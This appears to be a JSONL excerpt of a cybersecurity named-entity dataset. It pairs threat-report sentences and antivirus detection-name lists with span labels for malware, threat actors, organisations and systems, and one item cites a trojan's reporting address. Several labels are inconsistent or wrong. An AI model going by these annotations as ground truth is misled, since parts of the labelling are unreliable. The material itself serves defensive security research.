{"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O Trojan.Xorist Ransom_Xorist.R029C0DLN17 Win32.Trojan.Filecoder.p W32/Ransom.GEQX-2455 Ransom_Xorist.R029C0DLN17 Trojan-Ransom.Win32.Xorist.lr Trojan.Win32.Xorist.ewkyne Trojan.Win32.Z.Xorist.3077 Troj.Ransom.W32!c Trojan.Win32.Xorist.b Trojan.Encoder.4210 Trojan.Xorist.Win32.1605 Trojan-Ransom.FileCoder Trojan.Xorist.wdr Trojan-Ransom.Win32.Xorist.lr Trojan:Win32/Eksor.A Worm/Win32.Zhelatin.C112256 Hoax.Xorist Trj/CI.A Win32/Filecoder.NFV W32/Filecoder.NFV!tr Win32/Trojan.Xorist.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003111", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Onion.A Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.JIQA-6859 Ransom_.97182692 Trojan.Win32.CZOF.ejtmuo Trojan.Inject2.23490 Ransom_.97182692 BehavesLike.Win32.Ransom.cc TrojanDropper:Win32/Cerber.A Trojan/Win32.Cerber.R182622 Win32/Filecoder.Cerber.B Trojan.Injector!tlnazaf/C8k W32/Injector.DAJC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003113", "source": "cyner2_train"}}
{"text": "Security firm ThreatFabric has discovered a new variant of the Xenomorph malware family, which it describes as the most advanced and dangerous Android banking trojans in circulation, and which has new features.", "spans": {"ORGANIZATION: Security firm ThreatFabric": [[0, 26]], "MALWARE: variant": [[48, 55]], "MALWARE: the Xenomorph malware family,": [[59, 88]], "MALWARE: dangerous Android banking trojans": [[133, 166]]}, "info": {"id": "cyner2_train_003114", "source": "cyner2_train"}}
{"text": "After beginning an investigation into the affiliated malware samples and domains, we quickly came to realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform's CIMPLICITY HMI solution suite.", "spans": {"MALWARE: malware samples": [[53, 68]], "THREAT_ACTOR: group": [[123, 128]], "ORGANIZATION: SCADA-centric victims": [[154, 175]], "ORGANIZATION: GE Intelligent Platform's": [[190, 215]], "SYSTEM: CIMPLICITY HMI solution suite.": [[216, 246]]}, "info": {"id": "cyner2_train_003116", "source": "cyner2_train"}}
{"text": "In the observed campaign, the attackers abuse a feature in Windows called the Windows Troubleshooting Platform WTP, intended for troubleshooting problems, to socially engineer the recipients into executing malware.", "spans": {"THREAT_ACTOR: campaign,": [[16, 25]], "THREAT_ACTOR: attackers": [[30, 39]], "VULNERABILITY: abuse": [[40, 45]], "SYSTEM: Windows": [[59, 66]], "VULNERABILITY: Windows Troubleshooting Platform WTP,": [[78, 115]], "VULNERABILITY: troubleshooting problems,": [[129, 154]]}, "info": {"id": "cyner2_train_003117", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Yunsip.A5 W32.Yunsip Win32/Tnega.XWcDLN WORM_YUNSIP.SMR Trojan.Win32.FakeMS.tpd Trojan.PWS.Spy.20716 WORM_YUNSIP.SMR TR/PSW.Yunsip.axyza Trojan.Zusy.D56F7 Trojan.Win32.PSWIGames.191268 PWS:Win32/Yunsip.A Trojan/Win32.Infostealer.R758 TScope.Malware-Cryptor.SB Backdoor.Win32.Inject Trj/CI.A Trojan.Win32.FakeUsp10.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003118", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.5316 Trojan.Iframeexec Exploit.Html.Iframe.udgq BehavesLike.Win32.Dropper.wc W32/Trojan.MRKD-5424", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003119", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.FC.316 MSIL.Backdoor.Orcus.A Trojan.DownLoader24.65022 Win-Trojan/OrcusRAT.Exp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003121", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Paranoia.240640 Application.Badjoke Riskware.Win32.Paranoia.cckyo JOKE_PARANOIA.A Joke.Paranoia Joke.Paranoia!EAb1BDrutFU Joke.Paranoia Trojan.Win32.E3E61A09 JOKE_PARANOIA.A JOKE/Paranoia.A Win-Trojan/Paranoia.240640 Hacktool.Win32.Paranoia.BA Win32/Joke.13f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003122", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Hacktool.Mimikatz Win64.Riskware.Mimikatz.B Trojan.Win32.Meterpreter.ewppjl Tool.Mimikatz.88 BehavesLike.Win32.Worm.fh HackTool.Win32.Meterpreter HackTool/Win32.Meterpreter Unwanted/Win32.Mimikatz.R175513 Trj/GdSda.A Win32.Hacktool.Meterpreter.Pbfr Win32/Trojan.Hacktool.8d0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003123", "source": "cyner2_train"}}
{"text": "It is likely that the analyzed samples were created using the private version, as they are designed to run on modern 64-bit systems, although they could have been built based on sold, leaked or stolen source code.", "spans": {"SYSTEM: modern 64-bit systems,": [[110, 132]]}, "info": {"id": "cyner2_train_003124", "source": "cyner2_train"}}
{"text": "In this blog, FireEye Labs dissects this new ATM malware that we have dubbed RIPPER due to the project name ATMRIPPER identified in the sample and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand.", "spans": {"ORGANIZATION: FireEye Labs": [[14, 26]], "MALWARE: ATM malware": [[45, 56]], "MALWARE: RIPPER": [[77, 83]], "MALWARE: ATMRIPPER": [[108, 117]], "MALWARE: malware": [[204, 211]], "ORGANIZATION: ATMs": [[246, 250]], "ORGANIZATION: banks": [[254, 259]]}, "info": {"id": "cyner2_train_003125", "source": "cyner2_train"}}
{"text": "However, beginning on September 22, 2016, we detected the first large-scale email campaign distributing MarsJoke.", "spans": {"THREAT_ACTOR: email campaign": [[76, 90]], "MALWARE: MarsJoke.": [[104, 113]]}, "info": {"id": "cyner2_train_003127", "source": "cyner2_train"}}
{"text": "Exploit kits often integrate new or zero-day exploits in the hopes of getting a larger number of victims with systems that may not be as up-to-date with their patches.", "spans": {"MALWARE: Exploit kits": [[0, 12]], "VULNERABILITY: zero-day exploits": [[36, 53]], "SYSTEM: systems": [[110, 117]]}, "info": {"id": "cyner2_train_003129", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TjnSpy.Golroted.S1819456 Trojan.Omaneat.Win32.266 Trojan/Injector.dkxl TSPY_FAREIT.SMBD W32/Omaneat.XICE-5093 TSPY_FAREIT.SMBD Trojan-Spy.MSIL.Omaneat.awa Trojan.Win32.Omaneat.eliuzg BehavesLike.Win32.Trojan.tc Trojan.Win32.Injector W32/Omaneat.Y Trojan[Spy]/MSIL.Omaneat TrojanSpy:MSIL/Golroted.B Trojan.Heur.E613EE Trojan-Spy.MSIL.Omaneat.awa Spyware/Win32.Omaneat.R194942 TrojanSpy.MSIL.Omaneat Trojan.Omaneat Win32/VB.OSK TrojanSpy.Omaneat! W32/Injector.DKXL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003132", "source": "cyner2_train"}}
{"text": "Following the identification of this campaign, Mandiant responded to multiple UNC2970 intrusions targeting U.S. and European Media organizations through spear-phishing that used a job recruitment theme.", "spans": {"THREAT_ACTOR: campaign,": [[37, 46]], "ORGANIZATION: Mandiant": [[47, 55]], "THREAT_ACTOR: UNC2970": [[78, 85]], "ORGANIZATION: U.S.": [[107, 111]], "ORGANIZATION: European Media organizations": [[116, 144]]}, "info": {"id": "cyner2_train_003133", "source": "cyner2_train"}}
{"text": "The conditionally injected script redirects to the Afraidgate campaign, which in turns pushes the Neutrino exploit kit.", "spans": {"THREAT_ACTOR: the Afraidgate campaign,": [[47, 71]], "MALWARE: Neutrino exploit kit.": [[98, 119]]}, "info": {"id": "cyner2_train_003134", "source": "cyner2_train"}}
{"text": "A recent tweet mentioned that a new banking malware called Nuclear Bot has started to appear for sale on underground marketplaces.", "spans": {"MALWARE: new banking malware": [[32, 51]], "MALWARE: Nuclear Bot": [[59, 70]], "THREAT_ACTOR: underground marketplaces.": [[105, 130]]}, "info": {"id": "cyner2_train_003136", "source": "cyner2_train"}}
{"text": "While the sample is a typical memory scraper, it appears to be hand rolled assembly language and comes in at only 5120 bytes.", "spans": {"MALWARE: memory scraper,": [[30, 45]], "SYSTEM: assembly language": [[75, 92]]}, "info": {"id": "cyner2_train_003139", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.SMSHoax.DT Hoax.Win32.ArchSMS!O Hoax.ArchSMS Joke-ArchSMS.a Hoax.ArchSMS Win32.Trojan.WisdomEyes.16070401.9500.9996 W32/SMShoax.A Win32/SMSSend.A Win.Trojan.Hoax-12 Hoax.Win32.ArchSMS.hzpg Application.SMSHoax.DT Riskware.Win32.Archsms.fuais Win32.Trojan-psw.Archsms.Wrqa Application.SMSHoax.DT Application.SMSHoax.DT Trojan.SMSSend.146 Trojan.ArchSMS.Win32.13 Joke-ArchSMS.a W32/SMShoax.FGEV-2767 JOKE/ArchSMS.A HackTool[Hoax]/Win32.ArchSMS Application.SMSHoax.DT Hoax.Win32.ArchSMS.hzpg Trojan:Win32/Zipparch.F Adware/Win32.SMSHoax.R15838 Trojan.SMS.23205 Application.SMSHoax.B Hoax.Win32.ArchSMS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003140", "source": "cyner2_train"}}
{"text": "In previous instances, Cyble Research and Intelligence Labs CRIL has exposed numerous phishing websites that have been used to steal sensitive data by utilizing a range of malware types, such as stealers, RATs, and bots.", "spans": {"ORGANIZATION: Cyble Research": [[23, 37]], "ORGANIZATION: Intelligence Labs CRIL": [[42, 64]], "MALWARE: malware": [[172, 179]], "MALWARE: stealers, RATs,": [[195, 210]], "MALWARE: bots.": [[215, 220]]}, "info": {"id": "cyner2_train_003141", "source": "cyner2_train"}}
{"text": "Early last month, a new variant of mobile ransomware SLocker detected by Trend Micro as ANDROIDOS_SLOCKER.OPST was detected, copying the GUI of the now-infamous WannaCry.", "spans": {"MALWARE: mobile ransomware SLocker": [[35, 60]], "ORGANIZATION: Trend Micro": [[73, 84]], "MALWARE: the now-infamous WannaCry.": [[144, 170]]}, "info": {"id": "cyner2_train_003144", "source": "cyner2_train"}}
{"text": "The Sundown exploit kit is a recent addition to the field of EKs, and analysis indicates that it is still in development by its creator.", "spans": {"MALWARE: Sundown exploit kit": [[4, 23]], "MALWARE: EKs,": [[61, 65]], "THREAT_ACTOR: creator.": [[128, 136]]}, "info": {"id": "cyner2_train_003145", "source": "cyner2_train"}}
{"text": "Apart from Banker, there are reports indicating that other banking Trojans, are doing the same thing.", "spans": {"MALWARE: Banker,": [[11, 18]], "MALWARE: banking Trojans,": [[59, 75]]}, "info": {"id": "cyner2_train_003146", "source": "cyner2_train"}}
{"text": "SamSam is manually deployed ransomware.", "spans": {"MALWARE: SamSam": [[0, 6]], "MALWARE: ransomware.": [[28, 39]]}, "info": {"id": "cyner2_train_003150", "source": "cyner2_train"}}
{"text": "The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize their existing current attack infrastructure.", "spans": {"ORGANIZATION: Japanese government, education, and commerce": [[26, 70]], "SYSTEM: infrastructure.": [[189, 204]]}, "info": {"id": "cyner2_train_003151", "source": "cyner2_train"}}
{"text": "With a few unsuccessful exceptions, the notion of locking a Mac device and holding its owner to ransom in return for access to the machine and its data has not yet proven an attractive proposition for attackers.", "spans": {"SYSTEM: Mac device": [[60, 70]], "ORGANIZATION: owner": [[87, 92]], "SYSTEM: machine": [[131, 138]], "THREAT_ACTOR: attackers.": [[201, 211]]}, "info": {"id": "cyner2_train_003153", "source": "cyner2_train"}}
{"text": "We call the malware PowerSniff.", "spans": {"MALWARE: malware PowerSniff.": [[12, 31]]}, "info": {"id": "cyner2_train_003154", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Funsoul.A Worm/W32.Funsoul.45568 W32/Funpo.worm I-Worm.Funsoul!LToVDiOSu1I W32.Funsoul@mm WORM_FUNSOUL.A Email-Worm.Win32.Funsoul Trojan.Win32.Funsoul.empb I-Worm.Win32.S.Funsoul.45568[h] Win32.Worm-email.Funsoul.Lizy Worm.Win32.Funpo.A Worm.Funsoul.Win32.1 WORM_FUNSOUL.A W32/Funpo.worm W32/Risk.JJPZ-6561 Worm:Win32/Funsoul.C W32.W.Funsoul!c Trojan/Win32.HDC Worm.Funsoul Win32/Funpo.A W32/Funsoul.A!worm Win32/Worm.724", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003155", "source": "cyner2_train"}}
{"text": "Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel XLSM documents.", "spans": {"THREAT_ACTOR: APT19": [[23, 28]], "MALWARE: macro-enabled": [[47, 60]]}, "info": {"id": "cyner2_train_003156", "source": "cyner2_train"}}
{"text": "Its main targets are armed forces, the defense industry, news media, politicians, and dissidents.", "spans": {"ORGANIZATION: armed forces, the defense industry, news media, politicians,": [[21, 81]], "ORGANIZATION: dissidents.": [[86, 97]]}, "info": {"id": "cyner2_train_003158", "source": "cyner2_train"}}
{"text": "The Trojan may connect to and send infection reports to the following remote location: [http://]46.45.138.138/pw/gate[REMOVED]", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_003159", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Downldr2.FRFU Backdoor.Trojan BackDoor.Calla.5 W32/Downloader.KWLG-4153 Backdoor:Win32/Matchaldru.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003160", "source": "cyner2_train"}}
{"text": "ESET detections of Android/AdDisplay.Ashas on Android devices by country Is adware harmful ? Because the real nature of apps containing adware is usually hidden to the user , these apps and their developers should be considered untrustworthy .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: Android/AdDisplay.Ashas": [[19, 42]]}, "info": {"id": "cyner2_train_003162", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 TR/AD.Fogels.hochw Trojan.Kazy.D161B6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003166", "source": "cyner2_train"}}
{"text": "The malware is delivered via an innovative and unique technique: a downloader we are calling Carp uses malicious macros in Microsoft Excel documents to compile embedded C# C Sharp Programming Language source code into an executable that in turn is run to deploy the Cardinal RAT malware family.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: downloader": [[67, 77]], "MALWARE: Carp": [[93, 97]], "MALWARE: malicious macros": [[103, 119]], "MALWARE: the Cardinal RAT malware family.": [[262, 294]]}, "info": {"id": "cyner2_train_003168", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.QuintesLTU.Trojan Win32.Klez.E@mm Worm/W32.Klez.114688 Email-Worm.Win32.Klez!O W32.Klez.E W32/Klez.e@MM Worm.Klez Worm.Klez.Win32.2 Worm.Klez W32/Klez.E@MM Win32.Worm.Klez.a W32/Klez.E@mm W32.Klez.E@mm Win32/Klez.E Win.Worm.Klez-2 Trojan.Win32.Staser.bqjn Win32.Klez.E@mm Trojan.Win32.Klez.gleq Win32.Klez.E@mm Worm.Win32.Klez.E Win32.HLLM.Klez.1 BehavesLike.Win32.Klez.cm Email-Worm.Win32.Klez.E W32/Klez.E@mm Worm/Klez.l W32.Worm.Klez WORM/Klez.E Worm[Email]/Win32.Klez.k Worm:Win32/Klez.E@mm Win32.Klez.EA8AF7 W32.W.Klez.l5N7 Trojan.Win32.Staser.bqjn Win32.Klez.E@mm Win32/Klez.worm.E Win32.Klez.E@mm Win32.HLLW.Klez.e I-Worm.Klez.E Win32/Klez.E I-Worm.Klez!qHFMVAGctoI W32/Klez.F", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003169", "source": "cyner2_train"}}
{"text": "The RAT, which according to compile timestamps first surfaced in November 2012, has been used in targeted intrusions through 2015.", "spans": {"MALWARE: RAT,": [[4, 8]]}, "info": {"id": "cyner2_train_003170", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1938 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.R Win.Trojan.VB-48987 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg W32.Virut.ltLS Win32.Virut.56 PE_VIRUX.R Win32/Virut.bt Virus/Win32.Virut.ce Win32.Virut.dd.368640 Virus.Win32.Virut.ce Win32.Virus.Virut.U Win32/Virut.F Virus.Virut.14 Win32/Virut.NBP Virus.Win32.Virut W32/Sality.AO Virus.Win32.Virut.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003171", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Icefog Backdoor.Trojan Backdoor.Win32.Icefog.as Backdoor.W32.Icefog!c BackDoor.Apper.1 BehavesLike.Win32.Downloader.hh W32/Trojan.KWYX-5577 Backdoor.Icefog.a Trojan[Backdoor]/Win32.Icefog Trojan.Johnnie.D5485 Backdoor.Win32.Icefog.as Trj/GdSda.A Win32.Backdoor.Icefog.Hmrl Win32/Trojan.db2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003172", "source": "cyner2_train"}}
{"text": "ESET presented our initial findings based on research into the Win32/Potao malware family in June, in our CCCC 2015 presentation in Copenhagen.", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: malware family": [[75, 89]], "ORGANIZATION: CCCC": [[106, 110]]}, "info": {"id": "cyner2_train_003174", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Adware.YVXR-5520 Trojan.Win32.SMSSend.dqubwq Trojan.Win32.Z.Archsms.1443328 Win32.Risk.Hoax.Alsz ApplicUnwnt.Win32.Hoax.ArchSMS.ACW Trojan.SMSSend.4307 Trojan.ArchSMS.Win32.17489 BehavesLike.Win32.PUP.tc Trojan.Win32.Clustinex Trojan/Win32.Unknown Win32.Troj.Undef.kcloud Trojan.Adware.SMSHoax.105 Trojan/Win32.ArchSMS.R77161 Hoax.ArchSMS!QwEIC3yXiN8 W32/ArchSMS.ACL!tr Win32/Trojan.a32", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003175", "source": "cyner2_train"}}
{"text": "The attackers are using social engineering tactics, such as offering coupon vouchers and free software applications like WhatsApp and Avast antivirus, to lure the end user into downloading and installing the malicious payload.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "SYSTEM: free software applications": [[89, 115]], "SYSTEM: WhatsApp": [[121, 129]], "SYSTEM: Avast antivirus,": [[134, 150]], "MALWARE: malicious payload.": [[208, 226]]}, "info": {"id": "cyner2_train_003178", "source": "cyner2_train"}}
{"text": "Floki Bot is a new malware variant that has recently been offered for sale on various darknet markets.", "spans": {"MALWARE: Floki Bot": [[0, 9]], "MALWARE: malware variant": [[19, 34]], "THREAT_ACTOR: darknet markets.": [[86, 102]]}, "info": {"id": "cyner2_train_003180", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WinfarotLTSAAAM.Adware Trojan.SalityStub.F Heur.Trojan.Win32.Small.1!O Trojan.Peels.A Trojan/Small.aljd Trojan.SalityStub.F Win32.Trojan.Small.a W32.Sality!dam TROJ_SALSTUB.SMA Win.Trojan.Small-13502 Trojan.Win32.Small.cpd Trojan.SalityStub.F Trojan.Win32.SalityNHost.99328 Trojan.SalityStub.F TrojWare.Win32.Salrenmetie.A Trojan.SalityStub.F Win32.Sector TROJ_SALSTUB.SMA BehavesLike.Win32.PWSZbot.nm Trojan/Win32.Small.cpd Trojan:Win32/Salrenmetie.A Troj.W32.Small.mzKi Trojan.Win32.Small.cpd Trojan.SalityStub.F Trojan/Win32.Small.R10023 Trojan.SalityStub.F TrojanSpy.Zbot!8p0pyjPs4nM Trojan.Win32.Salrenmetie Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003181", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Logger WS.Reputation.1 Trojan-Spy.MSIL.KeyLogger.qle TrojanSpy.KeyLogger!Do8qrKyq4l4 TrojanSpy.MSIL.gka TrojanSpy:MSIL/Keylogger.O Trojan.Spy.Keylogger!4B6E MSIL/Keylogger.BBA!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003182", "source": "cyner2_train"}}
{"text": "Usually, Android banking malware is spread with the goal to convince users to install it based on the top rated app name and icon such as Super Mario Run Flash Player or WhatsApp", "spans": {"MALWARE: Android banking malware": [[9, 32]], "SYSTEM: app": [[112, 115]], "MALWARE: Super Mario Run": [[138, 153]], "SYSTEM: Flash Player": [[154, 166]], "SYSTEM: WhatsApp": [[170, 178]]}, "info": {"id": "cyner2_train_003183", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Win32.Davobevix!O Worm.Wahrecks.A8 Trojan/AutoRun.Delf.et Win32.Worm.Autorun.i Win32/Tnega.BQFWNFC Worm.Win32.AutoRun.gzzs Trojan.Win32.Davobevix.crigwr Worm.Win32.Delf.fc Worm:W32/Autorun.OI Win32.HLLW.Autoruner.26228 Worm/Win32.Davobevix Worm:Win32/Wahrecks.A Worm.Win32.AutoRun.gzzs Worm.Win32.Autorun.aee", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003184", "source": "cyner2_train"}}
{"text": "Poseidon, also known as FindPOS, is a malware family designed for Windows point-of-sale systems.", "spans": {"MALWARE: Poseidon,": [[0, 9]], "MALWARE: FindPOS,": [[24, 32]], "MALWARE: malware": [[38, 45]], "SYSTEM: Windows point-of-sale systems.": [[66, 96]]}, "info": {"id": "cyner2_train_003185", "source": "cyner2_train"}}
{"text": "Odin comes after a slight dip over the weekend in the number of samples we saw hitting our classifier so perhaps the authors took a break to pull in some changes.", "spans": {"MALWARE: Odin": [[0, 4]], "THREAT_ACTOR: authors": [[117, 124]]}, "info": {"id": "cyner2_train_003186", "source": "cyner2_train"}}
{"text": "[Warning] infection of new Linux / Mayhem malware via Wordpress attacks", "spans": {"SYSTEM: Linux": [[27, 32]], "MALWARE: Mayhem malware": [[35, 49]]}, "info": {"id": "cyner2_train_003187", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanpws.Qqpass.16554 W32/Risk.TFVJ-6880 BehavesLike.Dropper.dc W32/MalwareF.IAIQ Trojan.Win32.Orsam", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003188", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.W.Burn.loBw Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor2.DCBA Win32.Botgor.1 BehavesLike.Win32.Backdoor.gz BehavesLike.Win32.ProcessHijack W32/Backdoor.RIAO-7334 Backdoor:Win32/Botgor.B Win32.Virus.Botgor.Pgwk W32/Botgor.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003191", "source": "cyner2_train"}}
{"text": "Also, the executable file is encoded in the Word document as an icon, and when it is executed it infects the system with a malware called ChChes.", "spans": {"SYSTEM: system": [[109, 115]], "MALWARE: malware": [[123, 130]], "MALWARE: ChChes.": [[138, 145]]}, "info": {"id": "cyner2_train_003195", "source": "cyner2_train"}}
{"text": "This malicious app, a variant of Android/Twitoor.A, can't be found on any official Android app store – it probably spreads by SMS or via malicious URLs. It impersonates a porn player app or MMS application but without having their functionality.", "spans": {"MALWARE: malicious app,": [[5, 19]], "SYSTEM: official Android app store": [[74, 100]]}, "info": {"id": "cyner2_train_003197", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan-GameThief.Lmir.a Heur:Trojan/PSW.WOW TrojanDownloader:Win32/Catinea.B Trojan.Graftor.D45818 Win32.Trojan.Graftor.Fig Trojan.Graftor!27RnMnK6sVU Trojan-GameThief.Win32.WOW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003198", "source": "cyner2_train"}}
{"text": "As of October 29, their technical team identified the problem and addressed the issue.", "spans": {"ORGANIZATION: technical team": [[24, 38]]}, "info": {"id": "cyner2_train_003199", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Llac.302593 TrojanPWS.Bropaler Trojan/Delf.opy Win32.Trojan.WisdomEyes.16070401.9500.9990 Trojan.Win32.Llac.kruq Trojan.Win32.Dwn.dzxxnb Troj.W32.Llac!c Trojan.DownLoader14.35508 Trojan.Llac.Win32.55406 BehavesLike.Win32.Worm.dc Trojan.Win32.PSW W32/Trojan.DQFT-9080 Trojan.Llac.bxm Trojan/Win32.Llac Trojan.Inject.2 Trojan.Win32.Llac.kruq PWS:Win32/Bropaler.A!bit Trojan.Llac Trj/GdSda.A Win32.Trojan.Llac.Sudw Trojan.Llac!VJVBvKAFEGg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003200", "source": "cyner2_train"}}
{"text": "Proofpoint researchers recently detected a large-scale malvertising attack by the so-called KovCoreG group, best known for distributing Kovter ad fraud malware and sitting atop the affiliate model that distributes Kovter more widely.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "THREAT_ACTOR: KovCoreG group,": [[92, 107]], "MALWARE: Kovter ad fraud malware": [[136, 159]], "MALWARE: Kovter": [[214, 220]]}, "info": {"id": "cyner2_train_003201", "source": "cyner2_train"}}
{"text": "Cisco Talos discovered a new malicious campaign from the well known actor Group 74 aka Tsar Team, Sofacy, APT28, Fancy Bear….", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "THREAT_ACTOR: new malicious campaign": [[25, 47]], "THREAT_ACTOR: Group 74": [[74, 82]]}, "info": {"id": "cyner2_train_003202", "source": "cyner2_train"}}
{"text": "It maintained a heavy offensive focus on Myanmar, Vietnam, Singapore, the Philippines, Malaysia, and Laos.", "spans": {}, "info": {"id": "cyner2_train_003203", "source": "cyner2_train"}}
{"text": "A Chinese advanced persistent threat APT compromised Forbes.com to set up a watering hole style web-based drive-by attack against US Defense and Financial Services firms in late November 2014.", "spans": {"THREAT_ACTOR: Chinese advanced persistent threat APT": [[2, 40]], "VULNERABILITY: watering hole style web-based drive-by attack": [[76, 121]], "ORGANIZATION: US Defense": [[130, 140]], "ORGANIZATION: Financial Services firms": [[145, 169]]}, "info": {"id": "cyner2_train_003204", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor:Win64/Warood.A BDoor.FCXN!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003205", "source": "cyner2_train"}}
{"text": "This precedent setting legal case would be followed by many Southeast Asian nations, as well as others around the globe.", "spans": {}, "info": {"id": "cyner2_train_003206", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Uds.Dangerousobject.Multi!c Trojan.Graftor.D3CA6C Trojan.Meciv! Win32/Meciv.G W32/Trojan.PSSM-5626 TR/Meciv.15872 Trojan.Win32.Z.Meciv.15872[h] Win32.Trojan.Strat.Ebgt Trojan.Win32.Meciv W32/Meciv.G!tr Trojan.Win32.Meciv.G", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003207", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Other.Virus.[Trj]!c Trojan.O97M.Phish", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003208", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.F820 Trojan.AVKiller.AW Trojan/W32.Packer.24576.CE Trojan.Pakes Trojan.AVKiller.AW Trojan.AVKiller.AW Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.AVKiller.AW Trojan.Win32.Pakes.blv Trojan.AVKiller.AW Trojan.AVKiller.AW TrojWare.Win32.TrojanSpy.SpyEyes.B Trojan.MulDrop.8347 BehavesLike.Win32.RAHack.mc Backdoor.Win32.Kbot.aq Trojan.Pakes.bgg Trojan/Win32.Pakes Win32.Hack.RCryptor.a.10301 Trojan.Win32.Pakes.blv SScope.Malware-Cryptor.Hlux Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003209", "source": "cyner2_train"}}
{"text": "Cyber criminals continue to use exploit kits to infect victims with ransomware but they also use MALSPAM emails to lure possible victims – a key vector into an enterprise environment that lacks the proper security controls, and one with insufficient information security training for end users.", "spans": {"THREAT_ACTOR: Cyber criminals": [[0, 15]], "MALWARE: exploit kits": [[32, 44]], "MALWARE: ransomware": [[68, 78]], "VULNERABILITY: key vector": [[141, 151]], "ORGANIZATION: enterprise environment": [[160, 182]], "SYSTEM: end users.": [[284, 294]]}, "info": {"id": "cyner2_train_003211", "source": "cyner2_train"}}
